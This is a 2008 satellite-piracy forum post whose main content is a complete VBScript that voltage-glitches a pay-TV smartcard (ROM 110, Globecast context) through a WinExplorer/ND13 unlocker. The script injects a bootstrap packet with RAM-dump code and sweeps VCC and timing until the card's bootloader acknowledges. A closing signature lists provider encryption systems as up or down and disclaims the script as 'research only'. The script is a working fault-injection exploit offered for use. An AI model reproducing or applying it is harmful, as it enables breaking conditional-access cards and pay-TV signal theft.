Thread: Globecast Autoroll-i ako nije za public RSA
View Single Post
  #2 (permalink)  
Old 18th June 2008, 10:57 PM
50CENT1's Avatar
50CENT1 50CENT1 is online now
Super Moderator
  
Join Date: Jul 2005
Location: Germany&USA
Posts: 1,208
Post SCRIPT 110 ROM(GlobeCast)
' New VB Script File - Created 05/02/2006
'
' Script Test Glitch Rom 110. Based on original used at Rom 102 , Thank's for the original Authors.
'
' Code Based on original from Lynard used at Rom 102.
'
' Don't Dump Any Byte , ONLY PURPOSES EDUCATIONAL .
'
' Notes:
' This Script REQUIRES ND13 and it will check for it!!!
'
' Good Luck and no LOOPING cards!!!
'
' Developed by Zyxel
'
'
OPTION EXPLICIT

Call SetupUnlocker()

Dim BootStrapCmd17
Dim BSCLen
Dim BSCRSP
Dim BSACK
Dim CmdToGlitch
Dim CTGLen
Dim CTGRSP
Dim CS
Dim Bytes
Dim BytesRead
Dim Bytes1
Dim Bytes2
Dim DelayStart
Dim DelayLimit
Dim VCCStart
Dim VCCLimit
Dim GlitchType
Dim Delay
Dim VCC
Dim Dot
Dim ATRrsp
Dim loopctr

Sub Main()

clearoutputwindow
Sc.Verbose = False
loopctr = 0
if CheckChipVer <> 1 then
Sc.MsgBox("You need chip version ND13 to run this script" & VbCr & "Flash your Atmel chip with NewD12.hex")
Exit Sub
End if

DelayStart = &h2E0
DelayLimit = &h330
VCCStart = &h25
VCCLimit = &h05
GlitchType = 9
Sc.Verbose = 1 'Turn echo on - False = turns it off

'-----------------------------------------------------------------------------------------------------------------------

BootStrapCmd17="21406DA0CA000067046541018600AA9D9D 9D9D9D9D9D9D9D9D9D9D9BA6AEAD294AAD1A26FB9D9D9D9D9D 9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9DAD0EB740A6F04A26 FDB640819D9DB7404FADF3AE0A431100ADE820001000ADE298 25041100200410002000ADD5485A26F010008102"

'--------------------------------------------------------------------------------------
BSCRSP = 8 'Expected Response = 12 00 04 84 00 90 00 02
'Length = 8 bytes
BSACK = &HAE 'Boot Strap running Acknowledge byte
'************************************************* *************************
CmdToGlitch = "21 00 08 A0 CA 00 00 02 15 00 86"
CTGRSP = &h01 'Length in bytes of expected response
'************************************************* *************************

BSCLen = GetPacketLen(BootStrapCmd17)

if (BSCLen AND 1) = 1 then
Sc.MsgBox("Bad BootStrapCmd17 packet")
sc.print BSCLen
Exit Sub
End if

BSCLen = BSCLen / 2
BSCLen = BSCLen + 1 'add Checksum byte to packet length

CTGLen = GetPacketLen(CmdToGlitch)

if (CTGLen AND 1) = 1 then
Sc.MsgBox("Bad CmdToGlitch packet")
Exit Sub
End if

CTGLen = CTGLen / 2
CTGLen = CTGLen + 1 'add Checksum byte to packet length

CS=DoCheckSum (BootStrapCmd17) 'Calculates BootStrapCmd17 Checksum
BootStrapCmd17 = BootStrapCmd17 + CS 'add checksum to packet

CS=DoCheckSum (CmdToGlitch) 'Calculates packet Checksum
CmdToGlitch = CmdToGlitch + CS 'add checksum to packet

Delay = DelayStart
VCC = VCCStart
Sc.Print "Searching...." & VbCr
Dot = 0 'Dot progress counter if Sc.Verbose = False

Do
Do
Sc.Write("A2")
Sc.Write("B0" & HexString(VCC, 2)) 'set glitch VCC

Sc.Write("06 10 01 03 50 1A 00") 'reset card
Sc.Read(02)

ATRrsp = Sc.Getbyte(1)
if ATRrsp = &h1B then 'check card reset ok
Sc.Read(ATRrsp)
Exit Do
else
print VbCr & "NO ATR Rcv'd, trying 2nd ATR...." & VbCr
sc.delay(100)
Sc.Write("B0" & HexString(VCC, 2)) 'set glitch VCC
Sc.Write("06 10 01 03 50 1A 00") 'reset card
Sc.Read(02)
ATRrsp = Sc.Getbyte(1)
if ATRrsp = &h1B then 'check card reset ok
Sc.Read(ATRrsp)
Exit Do
else
print VbCr & "NO 2nd ATR Rcv'd, exiting script...." & VbCr
exit sub
end if
End if
loop

Sc.Write("02 15 00") 'set Tx/Rx to 32 cycles per bit
Sc.Read(02)

'Send dirty EMM (Cmd04) with our ram dump code
Sc.Write(HexString((BSCLen + 5), 2) & "60" & HexString((BSCLen - 1), 2) & BootStrapCmd17 & "50" & HexString((BSCRSP - 1), 2) & "00")
Sc.Read(2)

Bytes = Sc.Getbyte(1)
if Bytes > 0 then
Bytes = Sc.Read(Bytes)
Bytes1 = Sc.Getbyte(0)
Bytes2 = Sc.Getbyte(5)
'--------check response to make sure = 12 00 04 97 00 90 00 11--------
if Bytes1 = &h12 and Bytes2 = &h90 then
sc.verbose = false
else
print VbCr & "Bad CMD04 response...exiting sub..." & VbCr
exit sub
end if
else
print VbCr & "Bad CMD04 response...exiting sub..." & VbCr
exit sub
End if
'loader glitch packet

Sc.Print "VCC = "& HexString(VCC, 2) & " (~" & ((5/255) * VCC) &" vdc)" & VbCr
Sc.Print "Glitch Delay = "& HexString(Delay, 4) & VbCr
Sc.Print "Glitch type " & HexString(GlitchType, 2) & VbCr
Sc.Print "===========================================" & VbCr
Sc.Write(HexString((CTGLen + 10), 2) & "1F 60" & HexString((CTGLen - 1), 2) & CmdToGlitch & "20" & HexString(Delay, 4) & HexString(GlitchType, 2) & "50" & HexString((CTGRSP - 1), 2) & "00")

Sc.Read(2)
BytesRead = Sc.Getbyte(1)
if BytesRead > 0 then
sc.verbose = true
Bytes = Sc.Read(BytesRead)
sc.verbose = false
Bytes1 = Sc.getbyte(0)
if BytesRead > 1 then
Bytes2 = Sc.getbyte(1)
end if
if Bytes1 = &hAE then '
sc.verbose = true
Sc.Write("A1")
Sc.Print VbCr
Sc.Print "===========================================" & VbCr
Sc.Print "Glitch Success!!" & VbCr
Sc.Print "BootLoader Ack Received!!" & VbCr
Sc.Print "VCC = "& HexString(VCC, 2) & " (~" & ((5/255) * VCC) &" vdc)" & VbCr
Sc.Print "Glitch Delay = "& HexString(Delay, 4) & VbCr
Sc.Print "Glitch type " & HexString(GlitchType, 2) & VbCr
Sc.Print "===========================================" & VbCr
Exit Sub

else
print VbCr & "ACK not received yet......continuing...." & VbCr
end if
else
print VbCr & "No CMD15 bytes received....continuing...." & VbCr
End if

VCC = VCC - 1

if VCC = VCCLimit then
VCC = VCCStart
Delay = Delay + .1
end if
if Delay > DelayLimit then
Delay = DelayStart

end if


loopctr = loopctr +1
if loopctr = 100 then
clearoutputwindow
loopctr = 0
end if


loop

End Sub

Function GetPacketLen (Packet)
Dim Length
Dim Temp
Dim PK
Dim i

PK = ""

Length = Len(Packet) 'get packet length with spaces

for i = 1 to Length
Temp = Mid(Packet, i, 1)
if Temp <> " " then 'remove all spaces in packet
PK = PK + Temp
End if
next

GetPacketLen = Len(PK) 'return packet length without spaces

End Function


Function DoCheckSum (Packet)
Dim Temp
Dim Length
Dim PK
Dim CheckSum
Dim i

PK=""

Length = Len(Packet) 'get packet length with spaces

for i = 1 to Length
Temp = Mid(Packet, i, 1)
if Temp <> " " then 'remove all spaces in packet
PK = PK + Temp
End if
next

Length = Len(PK) 'get packet length without spaces

CheckSum = 0

for i = 0 to Length
i=i+1 'Simulate Step 2 in VB scripting
Temp = Mid(PK, i, 2)
CheckSum = CheckSum XOR Hex2Dec(Temp) 'Calc Checksum
next

DoCheckSum = HexString(CheckSum, 2) 'convert checksum to a hex strimg and return it to caller

End Function

Function Hex2Dec(HexNumber)
' This function takes 1 argument, a string containing a hex value of any digit length
' and returns the decimal equivalent
Dim DecimalValue
Dim DigitCount
Dim Digit
Dim HexDigit

HexNumber = Replace(UCase(HexNumber), " ", "")
DigitCount = Len(HexNumber)

For Digit = 1 To DigitCount

HexDigit = Mid(HexNumber, Digit, 1)
If Asc(HexDigit) < 58 Then
DecimalValue = HexDigit * 16 ^ (DigitCount - Digit)
Else
DecimalValue = (Asc(HexDigit) - 55) * 16 ^ (DigitCount - Digit)
End If
Hex2Dec = Hex2Dec + DecimalValue
Next

End Function

Function HexString(Number,Length)
' This function takes 2 arguments, a number and a length. It converts the decimal
' number given by the first argument to a Hexidecimal string with its length
' equal to the number of digits given by the second argument
Dim RetVal
Dim CurLen
RetVal=Hex(Number)
CurLen=Len(RetVal)
If CurLen<Length Then
RetVal=String(Length-CurLen,"0") & RetVal
End If
HexString=RetVal
End Function

Function CheckChipVer()

CheckChipVer = 1

sc.write("90")
sc.delay(80)

if sc.read(4) <> 4 then
CheckChipVer = 0
Exit Function
End if

if getbyte(0) <> &H4E then CheckChipVer = 0
if getbyte(1) <> &H44 then CheckChipVer = 0
if getbyte(2) <> &H31 then CheckChipVer = 0
if getbyte(3) <> &H33 then CheckChipVer = 0

End Function

Function setupunlocker()
sc.print "________________Setting up WinExplorer_________________" & VbCr
Wx.BaudRate = 115200
Wx.ResetBaudRate = 115200
Wx.Parity = 0 ' 0 = None, 1 = Odd, 2 = Even, 3 = Mark, 4 = Space
Wx.StopBits = 0 ' 0 = 1 stop bit, 1 = 1.5 stop bits, 2 = 2 stop bits
Wx.DTRControl = 0 ' Initial state of DTR 0 = off, 1 = on
Wx.RTSControl = 1 ' Initial state of RTS 0 = off, 1 = on
Wx.ResetDelay = 100 ' In microseconds
Wx.ByteDelay = 10 ' In microseconds
Wx.RxByteTimeout = 500 ' In milliseconds
Wx.ResetMode = 2 ' 0 = No Resets, 1 = ISO Reset (Expect a ATR), 2 = Device Reset (No ATR)
Wx.ResetLine = 1 ' 0 = Toggle RTS for Reset, 1 = Toggle DTR for Reset
Wx.ByteConvention = 1 ' 0 = Inverse, 1 = Direct
Wx.FlushEchoByte = 0 ' 0 = no flush, 1 = flush - A Phoenix interface will echo each byte transmitted.
Wx.FlushBeforeWrite = 1 ' 0 = no flush, 1 = flush - Flush the receive buffer before each write to strip off Null bytes.
Wx.IgnoreTimeouts = 1 ' 0 = Abort script on a receive timeout, 1 = Ignore all receive timeouts
Wx.ResetAfterTimeout = 0 ' 0 = Don't reset after a timeout, 1 = do a reset after a timeout - Not used if "IgnoreTimeouts=0"
Wx.LogTransactions = 0 ' 0 = Don't log transactions, 1 = log transactions
Wx.DisplayUSW = 0 ' Display USW after script complete 0 = no, 1 = yes
Wx.DisplayFuse = 0 ' Display Fuse after script complete 0 = no, 1 = yes
__________________
thanks for watching my post.

50CENT1 sa postovanjem!!!
11.18.2008
GlobeCast N2-DOWN N3-DOWN
Total TV UP Videogouard , Pink Media Group UP Irdeto2 Biss Videogouard,SATOPIA AND ICON DOWN ON GLOBECAST WORLD TV
WARNING----- Please consider: That watching Pay TV without a valid
subscription is illegal!! All files serve only research purposes!
I won't take responsibility !!!!!!